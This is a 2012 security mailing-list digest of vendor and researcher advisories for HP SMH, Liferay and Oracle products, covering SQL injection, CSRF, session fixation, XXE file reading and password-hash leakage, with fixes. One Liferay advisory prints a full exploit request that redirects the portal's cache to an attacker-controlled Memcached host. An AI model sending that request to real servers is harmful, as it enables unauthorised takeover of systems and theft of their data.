date:20120420

[security bulletin] HPSBMU02764 SSRT100827 rev.2 - HP System Management Homepage (SMH) Running on Linux and Windows, Remote Cross Site Request Forgery (CSRF), Denial of Service (DoS), Execution of Arb

2012-04-20 Thread security-alert

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03280632
Version: 2

HPSBMU02764 SSRT100827 rev.2 - HP System Management Homepage (SMH) Running on 
Linux and Windows, Remote Cross Site Request Forgery (CSRF), Denial of Service 
(DoS), Execution of Arbitrary Code, Other Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2012-04-16
Last Updated: 2012-04-19

Potential Security Impact: Remote cross site request forgery (CSRF), Denial of 
Service (DoS), execution of arbitrary code, other vulnerabilities

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP System 
Management Homepage (SMH) running on Linux and Windows. The vulnerabilities 
could be exploited remotely and locally resulting in cross site request forgery 
(CSRF), Denial of Service (DoS), execution of arbitrary code, and other 
vulnerabilities.

References: CVE-2009-0037, CVE-2010-0734, CVE-2010-1452, CVE-2010-1623, 
CVE-2010-2068, CVE-2010-2791, CVE-2010-3436, CVE-2010-4409, CVE-2010-4645, 
CVE-2011-0014, CVE-2011-0195, CVE-2011-0419, CVE-2011-1148, CVE-2011-1153, 
CVE-2011-1464, CVE-2011-1467, CVE-2011-1468, CVE-2011-1470, CVE-2011-1471, 
CVE-2011-1928, CVE-2011-1938, CVE-2011-1945, CVE-2011-2192, CVE-2011-2202, 
CVE-2011-2483, CVE-2011-3182, CVE-2011-3189, CVE-2011-3192, CVE-2011-3267, 
CVE-2011-3268, CVE-2011-3207, CVE-2011-3210, CVE-2011-3348, CVE-2011-3368, 
CVE-2011-3639, CVE-2011-3846, SSRT100376, CVE-2012-0135, SSRT100609, 
CVE-2012-1993, SSRT10043

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP System Management Homepage (SMH) before v7.0 running on Linux and Windows.

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2009-0037(AV:N/AC:M/Au:N/C:P/I:P/A:P)6.8
CVE-2010-0734(AV:N/AC:M/Au:N/C:P/I:P/A:P)6.8
CVE-2010-1452(AV:N/AC:L/Au:N/C:N/I:N/A:P)5.0
CVE-2010-1623(AV:N/AC:L/Au:N/C:N/I:N/A:P)5.0
CVE-2010-2068(AV:N/AC:L/Au:N/C:P/I:N/A:N)5.0
CVE-2010-2791(AV:N/AC:L/Au:N/C:P/I:N/A:N)5.0
CVE-2010-3436(AV:N/AC:L/Au:N/C:N/I:P/A:N)5.0
CVE-2010-4409(AV:N/AC:L/Au:N/C:N/I:N/A:P)5.0
CVE-2010-4645(AV:N/AC:L/Au:N/C:N/I:N/A:P)5.0
CVE-2011-0014(AV:N/AC:L/Au:N/C:N/I:N/A:P)5.0
CVE-2011-0195(AV:N/AC:M/Au:N/C:P/I:N/A:N)4.3
CVE-2011-0419(AV:N/AC:M/Au:N/C:N/I:N/A:P)4.3
CVE-2011-1148(AV:N/AC:L/Au:N/C:P/I:P/A:P)7.5
CVE-2011-1153(AV:N/AC:L/Au:N/C:P/I:P/A:P)7.5
CVE-2011-1464(AV:N/AC:M/Au:N/C:N/I:N/A:P)4.3
CVE-2011-1467(AV:N/AC:L/Au:N/C:N/I:N/A:P)5.0
CVE-2011-1468(AV:N/AC:M/Au:N/C:N/I:N/A:P)4.3
CVE-2011-1470(AV:N/AC:M/Au:N/C:N/I:N/A:P)4.3
CVE-2011-1471(AV:N/AC:M/Au:N/C:N/I:N/A:P)4.3
CVE-2011-1928(AV:N/AC:M/Au:N/C:N/I:N/A:P)4.3
CVE-2011-1938(AV:N/AC:L/Au:N/C:P/I:P/A:P)7.5
CVE-2011-1945(AV:N/AC:H/Au:N/C:P/I:N/A:N)2.6
CVE-2011-2192(AV:N/AC:M/Au:N/C:P/I:N/A:N)4.3
CVE-2011-2202(AV:N/AC:L/Au:N/C:N/I:P/A:P)6.4
CVE-2011-2483(AV:N/AC:L/Au:N/C:P/I:N/A:N)5.0
CVE-2011-3182(AV:N/AC:L/Au:N/C:N/I:N/A:P)5.0
CVE-2011-3189(AV:N/AC:M/Au:N/C:P/I:N/A:N)4.3
CVE-2011-3192(AV:N/AC:L/Au:N/C:N/I:N/A:C)7.8
CVE-2011-3267(AV:N/AC:L/Au:N/C:N/I:N/A:P)5.0
CVE-2011-3268(AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2011-3207(AV:N/AC:L/Au:N/C:N/I:P/A:N)5.0
CVE-2011-3210(AV:N/AC:L/Au:N/C:N/I:N/A:P)5.0
CVE-2011-3348(AV:N/AC:M/Au:N/C:N/I:N/A:P)4.3
CVE-2011-3368(AV:N/AC:L/Au:N/C:P/I:N/A:N)5.0
CVE-2011-3639(AV:N/AC:M/Au:N/C:N/I:P/A:N)4.3
CVE-2011-3846(AV:N/AC:M/Au:N/C:P/I:P/A:P)6.8
CVE-2012-0135(AV:N/AC:M/Au:S/C:N/I:N/A:P)3.5
CVE-2012-1993(AV:L/AC:L/Au:S/C:P/I:P/A:N)3.2
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Sow Ching Shiong coordinating with Secunia 
for reporting CVE-2011-3846 to security-al...@hp.com.

The Hewlett-Packard Company thanks Silent Dream for reporting CVE-2012-0135 to 
security-al...@hp.com

RESOLUTION

HP has provided HP System Management Homepage v7.0 or subsequent to resolve the 
vulnerabilities.

SMH v7.0 is available here: 
http://h18000.www1.hp.com/products/servers/management/agents/index.html

HISTORY
Version:1 (rev.1) 16 April 2012 Initial release
Version:2 (rev.2) 19 April 2012 Remove CVE-2011-4317

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in

IPv6 host scanning in IPv6

2012-04-20 Thread Fernando Gont

Folks,

We've just published an IETF internet-draft about IPv6 host scanning
attacks.

The aforementioned document is available at:


The Abstract of the document is:
 cut here 
   IPv6 offers a much larger address space than that of its IPv4
   counterpart.  The standard /64 IPv6 subnets can (in theory)
   accommodate approximately 1.844 * 10^19 hosts, thus resulting in a
   much lower host density (#hosts/#addresses) than their IPv4
   counterparts.  As a result, it is widely assumed that it would take a
   tremendous effort to perform host scanning attacks against IPv6
   networks, and therefore IPv6 host scanning attacks have long been
   considered unfeasible.  This document analyzes the IPv6 address
   configuration policies implemented in most popular IPv6 stacks, and
   identifies a number of patterns in the resulting addresses lead to a
   tremendous reduction in the host address search space, thus
   dismantling the myth that IPv6 host scanning attacks are unfeasible.
 cut here 

Any comments will be very welcome (note: this is a drafty initial
version, with lots of stuff still to be added... but hopefully a good
starting point, and a nice reading ;-) ).

Thanks!

P.S.: Public discussion mostly welcome on the IPv6 hackers mailing-list
, but I'd be happy
to discuss it here, too.

Best regards,
-- 
Fernando Gont
SI6 Networks
e-mail: fg...@si6networks.com
PGP Fingerprint:  31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492

Specially crafted webdav request allows reading of local files on liferay 6.0.x

2012-04-20 Thread Jelmer Kuperus

Specially crafted webdav request allows reading of local files on liferay 6.0.x

Description:

Liferay Portal is an enterprise portal written in Java

By creating a specially crafted webdav request that contains an
external entity it is possible to read files from a liferay server.
and echo these back in the response.  You could use this for instance
to download configuration files containing database passwords or ssh
keys located in a users home folder

Proof of concept:

Code demonstrating the vulnerability can be found at

https://github.com/jelmerk/LPS-24562-proof

Systems affected:

Liferay 6.0.5 ce is confirmed to be vulnerable
Liferay 6.0.6 ce is confirmed to be vulnerable

Vendor status :

Liferay  was notified januari 2 2012 by filing a bug in their public
bugtracker under issue number LPS-24562. The issue has since been
flagged as private and has been resolved.

OCIPasswordChange API leaks information of password hash (CVE-2012-0511)

2012-04-20 Thread Shatter

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

AppSecInc Team SHATTER Security Advisory

OCIPasswordChange API leaks information of password hash.

Risk Level:
High

Affected versions:
Oracle Database Server version 10gR1, 10gR2 (10.2.0.4 and previous
patchsets) and 11gR1 (11.1.0.7 and previous patchsets)


Remote exploitable:
Yes (No authentication is required)

Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.

Details:
Oracle Database provides OCIPasswordChange API to change user passwords.
This API can be used while a user is logged on as well as before the
authentication process is completed, this is because it can be used for
accounts that have the password expired so that the user is able to
change an expired password for a new one.
It was observed that for locked accounts this API leaks information
about the correct user password hash by giving different responses,
depending on whether the decryption of the new password
(AUTH_NEW_PASSWORD field), performed by the server, is successful or
not.  This information can be used to perform an off-line brute force
attack to guess the correct password.  Internal proof-of-concept tool
demonstrated that it is possible to try millions of passwords per
second, making it possible to crack passwords that are less than 9
characters length in a few hours.
Note that to perform this attack the account must be locked.  An
attacker can lock an account by reaching the maximum failed login
attempts limit (by default 10).  The attacker will be able to log in as
the user once the account is unlocked.

Impact:
Remote unauthenticated attackers can perform off-line unlimited password
guesses on locked database accounts.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
Implement a strong password policy.
Use some kind of external authentication (like network or directory
service based) instead of native database authentication.

Fix:
Apply Oracle Critical Patch Update April 2012 available at Oracle Support.

CVE:
CVE-2012-0511

Links:
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
https://www.teamshatter.com/?p=3434

Timeline:
Vendor Notification - 12/08/2011
Vendor Response - 12/15/2011
Fix - 4/17/2012
Public Disclosure - 4/19/2012




- -- 
_
Copyright (c) 2012 Application Security, Inc.
http://www.appsecinc.com
About Application Security, Inc.

AppSecInc is a pioneer and leading provider of database security
solutions for the enterprise.
By providing strategic and scalable software-only solutions -
AppDetectivePro for auditors and IT advisors, and DbProtect for the
enterprise - AppSecInc supports the database security lifecycle for some
of the most complex and demanding environments in the world across more
than 1,300 active commercial and government customers.

Leveraging the world's most comprehensive database security
knowledgebase from the company's renowned team of threat researchers,
TeamSHATTER, AppSecInc products help customers achieve unprecedented
levels of data security from nefarious or accidental activities, while
reducing overall risk and helping to ensure continuous regulatory and
industry compliance.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (MingW32) - WinPT 1.4.3
Charset: UTF-8

iEYEARECAAYFAk+QeeMACgkQRx91imnNIgEmCQCcCLZ1sAbpmovyaaa5xJ+Zi41u
KkYAn1jcGgpMrvGuDE/7dvSIi5bOzQcO
=P0et
-END PGP SIGNATURE-

Oracle Enterprise Manager vulnerable to Session fixation (CVE-2012-0528)

2012-04-20 Thread Shatter

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

AppSecInc Team SHATTER Security Advisory

Oracle Enterprise Manager vulnerable to Session fixation.

Risk Level:
Low

Affected versions:
Oracle Enterprise Manager Database Control 10.2.0.5, 11.1.0.7 (and
previous patchsets)


Remote exploitable:
Yes

Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.

Details:
Authenticating a web user without invalidating any existing session
identifier gives an attacker the opportunity to steal authenticated
sessions.
Oracle Enterprise Manager authenticates a user without first
invalidating the existing session ID, thereby continuing to use the same
session ID already associated with the session.  This can be exploited
in shared computer environments if the attacker navigates to the login
web page /em/console/logon/logon and records the session ID associated,
then closes the browser.  When a legitimate user logs on, the same
Session ID will be used so the attacker will be able to take over the
session and perform operations on the victim's behalf.

Impact:
An attacker who has access to a computer with a web browser that will
later be used in an Oracle Enterprise Manager web session, can know
which session ID will be used, therefore will be able to impersonate the
legitimate user.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
There is no workaround for this vulnerability.

Fix:
Apply Oracle Critical Patch Update April 2012 available at Oracle Support.

CVE:
CVE-2012-0528

Links:
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
https://www.teamshatter.com/?p=3429

Timeline:
Vendor Notification - 08/16/2011
Vendor Response - 08/18/2011
Fix - 4/17/2012
Public Disclosure - 4/19/2012


- -- 
_
Copyright (c) 2012 Application Security, Inc.
http://www.appsecinc.com
About Application Security, Inc.

AppSecInc is a pioneer and leading provider of database security
solutions for the enterprise.
By providing strategic and scalable software-only solutions -
AppDetectivePro for auditors and IT advisors, and DbProtect for the
enterprise - AppSecInc supports the database security lifecycle for some
of the most complex and demanding environments in the world across more
than 1,300 active commercial and government customers.

Leveraging the world's most comprehensive database security
knowledgebase from the company's renowned team of threat researchers,
TeamSHATTER, AppSecInc products help customers achieve unprecedented
levels of data security from nefarious or accidental activities, while
reducing overall risk and helping to ensure continuous regulatory and
industry compliance.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (MingW32) - WinPT 1.4.3
Charset: UTF-8

iEYEARECAAYFAk+Qfx0ACgkQRx91imnNIgGI/wCgqXSOStpRZfnMwkh+60pys+Tc
rYcAn2o6p3yZKbJg5nFc2P5kb0ijL7lC
=QCBF
-END PGP SIGNATURE-

HTTP Response Splitting in Oracle Enterprise Manager (pageName parameter) (CVE-2012-0527)

2012-04-20 Thread Shatter

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

AppSecInc Team SHATTER Security Advisory

HTTP Response Splitting in Oracle Enterprise Manager (pageName parameter).

Risk Level:
Medium

Affected versions:
Oracle Enterprise Manager Database Control 10.2.0.5, 11.1.0.7, 11.2.0.3
(and previous patchsets)
Oracle Enterprise Manager Grid Control 10.2.0.5 (and previous patchsets)


Remote exploitable:
Yes

Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.

Details:
HTTP Response Splitting is a web application vulnerability where input
parameters are unsafely used in response headers allowing an attacker to
make the server print one (or more) new line sequences in the header
section which allows to set arbitrary headers, take control of the body,
or break the response into two or more separate responses.  This can be
used to perform cross-site scripting, cross-user defacement and web
cache poisoning, among other attacks.
The 'pageName' parameter of web page
/em/console/database/schema/grantObjPrivs is vulnerable to this kind of
attacks.

Impact:
An attacker that convinces a valid Oracle Enterprise Manager user to
click or open a malicious link can take over the user's session.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
There is no workaround for this vulnerability.

Fix:
Apply Oracle Critical Patch Update April 2012 available at Oracle Support.

CVE:
CVE-2012-0527

Links:
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
https://www.teamshatter.com/?p=3453

Timeline:
Vendor Notification - 08/16/2011
Vendor Response - 08/18/2011
Fix - 4/17/2012
Public Disclosure - 4/19/2012


- -- 
_
Copyright (c) 2012 Application Security, Inc.
http://www.appsecinc.com
About Application Security, Inc.

AppSecInc is a pioneer and leading provider of database security
solutions for the enterprise.
By providing strategic and scalable software-only solutions -
AppDetectivePro for auditors and IT advisors, and DbProtect for the
enterprise - AppSecInc supports the database security lifecycle for some
of the most complex and demanding environments in the world across more
than 1,300 active commercial and government customers.

Leveraging the world's most comprehensive database security
knowledgebase from the company's renowned team of threat researchers,
TeamSHATTER, AppSecInc products help customers achieve unprecedented
levels of data security from nefarious or accidental activities, while
reducing overall risk and helping to ensure continuous regulatory and
industry compliance.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (MingW32) - WinPT 1.4.3
Charset: UTF-8

iEYEARECAAYFAk+Qfs0ACgkQRx91imnNIgG0VgCePEMKr54zVy+j7xp2LPkmkbO4
d7cAn3NKD3adUs4L0ekEABkUf6tW0nxR
=8LE+
-END PGP SIGNATURE-

HTTP Response Splitting in Oracle Enterprise Manager (prevPage parameter) (CVE-2012-0526)

2012-04-20 Thread Shatter

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

AppSecInc Team SHATTER Security Advisory

HTTP Response Splitting in Oracle Enterprise Manager (prevPage parameter).

Risk Level:
Medium

Affected versions:
Oracle Enterprise Manager Database Control 10.2.0.5, 11.1.0.7, 11.2.0.3
(and previous patchsets)
Oracle Enterprise Manager Grid Control 10.2.0.5 (and previous patchsets)


Remote exploitable:
Yes

Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.

Details:
HTTP Response Splitting is a web application vulnerability where input
parameters are unsafely used in response headers allowing an attacker to
make the server print one (or more) new line sequences in the header
section which allows to set arbitrary headers, take control of the body,
or break the response into two or more separate responses.  This can be
used to perform cross-site scripting, cross-user defacement and web
cache poisoning, among other attacks.
The 'prevPage' parameter of web page /em/console/database/schema/table
is vulnerable to this kind of attacks.

Impact:
An attacker that convinces a valid Oracle Enterprise Manager user to
click or open a malicious link can take over the user's session.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
There is no workaround for this vulnerability.

Fix:
Apply Oracle Critical Patch Update April 2012 available at Oracle Support.

CVE:
CVE-2012-0526

Links:
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
https://www.teamshatter.com/?p=3448

Timeline:
Vendor Notification - 08/16/2011
Vendor Response - 08/18/2011
Fix - 4/17/2012
Public Disclosure - 4/19/2012


- -- 
_
Copyright (c) 2012 Application Security, Inc.
http://www.appsecinc.com
About Application Security, Inc.

AppSecInc is a pioneer and leading provider of database security
solutions for the enterprise.
By providing strategic and scalable software-only solutions -
AppDetectivePro for auditors and IT advisors, and DbProtect for the
enterprise - AppSecInc supports the database security lifecycle for some
of the most complex and demanding environments in the world across more
than 1,300 active commercial and government customers.

Leveraging the world's most comprehensive database security
knowledgebase from the company's renowned team of threat researchers,
TeamSHATTER, AppSecInc products help customers achieve unprecedented
levels of data security from nefarious or accidental activities, while
reducing overall risk and helping to ensure continuous regulatory and
industry compliance.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (MingW32) - WinPT 1.4.3
Charset: UTF-8

iEYEARECAAYFAk+QfegACgkQRx91imnNIgF9igCeOf7blacFjHI62y8mNXwwnwLT
RnoAnjw8sv+90Q9p11cczReudRQtM15Y
=HHlH
-END PGP SIGNATURE-

SQL Injection in Oracle Enterprise Manager (searchPage web page) (CVE-2012-0525)

2012-04-20 Thread Shatter

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

AppSecInc Team SHATTER Security Advisory

SQL Injection in Oracle Enterprise Manager (searchPage web page).

Risk Level:
High

Affected versions:
Oracle Enterprise Manager Database Control 11.1.0.7, 11.2.0.3 (and
previous patchsets)
Oracle Enterprise Manager Grid Control 10.2.0.5, 11.1.0.1 (and previous
patchsets)


Remote exploitable:
Yes

Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.

Details:
SQL Injection works by attempting to modify the parameters passed to an
application to change the SQL statements that are passed to a database.
SQL injection can be used to insert additional SQL statements to be
executed.
The 'SCPLBL_INSTALLED_DATE0DI' parameter used in web page
/em/console/ecm/search/searchPage is vulnerable to SQL Injection
attacks. This web page is part of Oracle Enterprise Manager web
application. It may be possible for a malicious user to execute SQL
statements with the elevated privileges of the SYSMAN database user in
the repository database. This user has the DBA role granted.

Impact:
This vulnerability allows an Oracle Enterprise Manager user to execute
SQL statements with the elevated privileges of the SYSMAN database user.
This may also be exploited by an attacker that convinces a valid user to
click or open a malicious link.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
There is no workaround for this vulnerability.

Fix:
Apply Oracle Critical Patch Update April 2012 available at Oracle Support.

CVE:
CVE-2012-0525

Links:
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
https://www.teamshatter.com/?p=3418

Timeline:
Vendor Notification - 08/16/2011
Vendor Response - 08/18/2011
Fix - 4/17/2012
Public Disclosure - 4/19/2012


- --
_
Copyright (c) 2012 Application Security, Inc.
http://www.appsecinc.com
About Application Security, Inc.

AppSecInc is a pioneer and leading provider of database security
solutions for the enterprise.
By providing strategic and scalable software-only solutions -
AppDetectivePro for auditors and IT advisors, and DbProtect for the
enterprise - AppSecInc supports the database security lifecycle for some
of the most complex and demanding environments in the world across more
than 1,300 active commercial and government customers.

Leveraging the world's most comprehensive database security
knowledgebase from the company's renowned team of threat researchers,
TeamSHATTER, AppSecInc products help customers achieve unprecedented
levels of data security from nefarious or accidental activities, while
reducing overall risk and helping to ensure continuous regulatory and
industry compliance.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (MingW32) - WinPT 1.4.3
Charset: UTF-8

iEYEARECAAYFAk+QfYQACgkQRx91imnNIgGWOwCgsufjSL919rDcBdVfbBE1KksU
a68An04O2Aw4ieW27Vr23D+topK2cV/R
=GjVN
-END PGP SIGNATURE-

Liferay 6.1 can be compromised in its default configuration

2012-04-20 Thread Jelmer Kuperus

Liferay 6.1 can be compromised in its default configuration

Description:

Liferay Portal is an enterprise portal written in Java

By utilizing the json webservices exposed by the platform you can
register a new user with any role in the system, including the built
in administrator role.
The problem lies in the addUser method of UserServiceUtil which
accepts a roleIds parameter. There are no checks on whether the
calling user has rights to assign this role. User self-registration
needs to be enabled on the portal to execute this attack.

Proof of concept:

Code demonstrating the vulnerability can be found at

https://github.com/jelmerk/LPS-26705-proof

Systems affected:

Liferay 6.1 ce is confirmed to be vulnerable
Liferay 6.1 ee is most likely vulnerable
Liferay 6 is probably only vulnerable when soap,hessian,burlap or
httpinvoker services are available to the attacker

Vendor status :

Liferay  was notified april 15 2012 by filing a bug in their public
bugtracker under issue number LPS-26705. The issue has since been
flagged as private and has not yet been resolved.

SQL Injection in Oracle Enterprise Manager (compareWizFirstConfig web page) (CVE-2012-0512)

2012-04-20 Thread Shatter

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

AppSecInc Team SHATTER Security Advisory

SQL Injection in Oracle Enterprise Manager (compareWizFirstConfig web page).

Risk Level:
High

Affected versions:
Oracle Enterprise Manager Database Control 11.1.0.7, 11.2.0.2 (and
previous patchsets)
Oracle Enterprise Manager Grid Control 10.2.0.4 (and previous patchsets)


Remote exploitable:
Yes

Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.

Details:
SQL Injection works by attempting to modify the parameters passed to an
application to change the SQL statements that are passed to a database.
SQL injection can be used to insert additional SQL statements to be
executed.
The 'fConfigGuid' parameter used in web page
/em/console/ecm/config/compareWizard/compareWizFirstConfig is vulnerable
to SQL Injection attacks. This web page is part of Oracle Enterprise
Manager web application. It may be possible for a malicious user to
execute SQL statements with the elevated privileges of the SYSMAN
database user in the repository database. This user has the DBA role
granted.

Impact:
This vulnerability allows an Oracle Enterprise Manager user to execute
SQL statements with the elevated privileges of the SYSMAN database user.
This may also be exploited by an attacker that convinces a valid user to
click or open a malicious link.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
There is no workaround for this vulnerability.

Fix:
Apply Oracle Critical Patch Update April 2012 available at Oracle Support.

CVE:
CVE-2012-0512

Links:
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
https://www.teamshatter.com/?p=3424

Timeline:
Vendor Notification - 10/16/2009
Vendor Response - 11/4/2009
Fix - 4/17/2012
Public Disclosure - 4/19/2012


- --
_
Copyright (c) 2012 Application Security, Inc.
http://www.appsecinc.com
About Application Security, Inc.

AppSecInc is a pioneer and leading provider of database security
solutions for the enterprise.
By providing strategic and scalable software-only solutions -
AppDetectivePro for auditors and IT advisors, and DbProtect for the
enterprise - AppSecInc supports the database security lifecycle for some
of the most complex and demanding environments in the world across more
than 1,300 active commercial and government customers.

Leveraging the world's most comprehensive database security
knowledgebase from the company's renowned team of threat researchers,
TeamSHATTER, AppSecInc products help customers achieve unprecedented
levels of data security from nefarious or accidental activities, while
reducing overall risk and helping to ensure continuous regulatory and
industry compliance.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (MingW32) - WinPT 1.4.3
Charset: UTF-8

iEYEARECAAYFAk+Qe+MACgkQRx91imnNIgE1uQCgssZNVY3xF1UVMynHPLgkHKsU
dEgAn2KNVgJnNUes1S0R4v4tlMqYEF5n
=0cMh
-END PGP SIGNATURE-

Specially crafted Json service request allows full control over a Liferay portal instance

2012-04-20 Thread Jelmer Kuperus

Specially crafted Json service request allows full control over a
Liferay portal instance

Description:

Liferay Portal is an enterprise portal written in Java

By doing a single http request you can reconfigure Liferay to use a
remote Memcached cache instead of it's own cache.

http://vulnerablehost/c/portal/json_service?serviceClassName=com.liferay.portal.service.UserServiceUtil&serviceMethodName=updatePortrait&serviceParameters=[%22userId%22%2C%22bytes%22]&userId=1&bytes={"class":"com.liferay.portal.kernel.dao.orm.EntityCacheUtil","entityCache":{"class":"com.liferay.portal.dao.orm.common.EntityCacheImpl","multiVMPool":{"class":"com.liferay.portal.cache.MultiVMPoolImpl","portalCacheManager":{"class":"com.liferay.portal.cache.memcached.MemcachePortalCacheManager","timeout":60,"timeoutTimeUnit":"SECONDS","memcachedClientPool":{"class":"com.liferay.portal.cache.memcached.DefaultMemcachedClientFactory","connectionFactory":{"class":"net.spy.memcached.BinaryConnectionFactory"},"addresses":["remoteattackerhost:11211"]}

This means that all entities stored in the database will now be cached
in a Memcached instance hosted on the attackers host, where they can
be retrieved or manipulated at will by the attacker. A moderately
skilled attacker could leverage this to gain administrative access to
the system. The attacker does not need to have an account on the
portal in order to execute this attack

Proof of concept:

Code demonstrating the vulnerability can be found at

https://github.com/jelmerk/LPS-26558-proof

Systems affected:

Liferay 6.1 ce is confirmed to be vulnerable
Liferay 6 ee service servicepack 2 is most likely vulnerable
Liferay 6.1 ee is most likely vulnerable

Vendor status :

Liferay  was notified april 6 2012 by filing a bug in their public
bugtracker under issue number LPS-26558. The issue has since been
flagged as private and has been resolved.

Some failed authentication attempts using OCIPasswordChange API are not recorded (CVE-2012-0511)

2012-04-20 Thread Shatter

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

AppSecInc Team SHATTER Security Advisory

Some failed authentication attempts using OCIPasswordChange API are not
recorded.

Risk Level:
Medium

Affected versions:
Oracle Database Server version 10gR1, 10gR2 (10.2.0.4 and previous
patchsets) and 11gR1 (11.1.0.7 and previous patchsets)


Remote exploitable:
Yes (No authentication is required)

Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.

Details:
Oracle Database provides OCIPasswordChange API to change user passwords.
This API can be used while a user is logged on as well as before the
authentication process is completed, this is because it can be used for
accounts that have the password expired so that the user is able to
change an expired password for a new one.
When this API is used to authenticate a user and at the same time change
the password, failed logins attempts are recorded only sporadically.
The failed login attempt will be recorded only when the decryption of
the new password (AUTH_NEW_PASSWORD field) performed by the server, is
successful.  This allows an attacker to perform much more failed logins
attempts than what are actually allowed by password policy.  The
approximate rate of failed login attempts that are recorded is only one
every 200 or more attempts.

Impact:
Remote unauthenticated attackers can perform a much higher numbers of
login attempts without being locked out by the password policy.  In
addition, the failed login attempt is not recorded in database auditing
trails.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
Implement a strong password policy.
Use network or directory service based authentication as opposed to
native database authentication.

Fix:
Apply Oracle Critical Patch Update April 2012 available at Oracle Support.

CVE:
CVE-2012-0511

Links:
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
https://www.teamshatter.com/?p=3440

Timeline:
Vendor Notification - 12/08/2011
Vendor Response - 12/15/2011
Fix - 4/17/2012
Public Disclosure - 4/19/2012


- --
_
Copyright (c) 2012 Application Security, Inc.
http://www.appsecinc.com
About Application Security, Inc.

AppSecInc is a pioneer and leading provider of database security
solutions for the enterprise.
By providing strategic and scalable software-only solutions -
AppDetectivePro for auditors and IT advisors, and DbProtect for the
enterprise - AppSecInc supports the database security lifecycle for some
of the most complex and demanding environments in the world across more
than 1,300 active commercial and government customers.

Leveraging the world's most comprehensive database security
knowledgebase from the company's renowned team of threat researchers,
TeamSHATTER, AppSecInc products help customers achieve unprecedented
levels of data security from nefarious or accidental activities, while
reducing overall risk and helping to ensure continuous regulatory and
industry compliance.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (MingW32) - WinPT 1.4.3
Charset: UTF-8

iEYEARECAAYFAk+Qe2YACgkQRx91imnNIgGbKQCaAmGaN+X+t8TgB9KaE53DEApF
d5UAoJhleLxqf78/sgJZvtG7gsYu8e3a
=+2TC
-END PGP SIGNATURE-

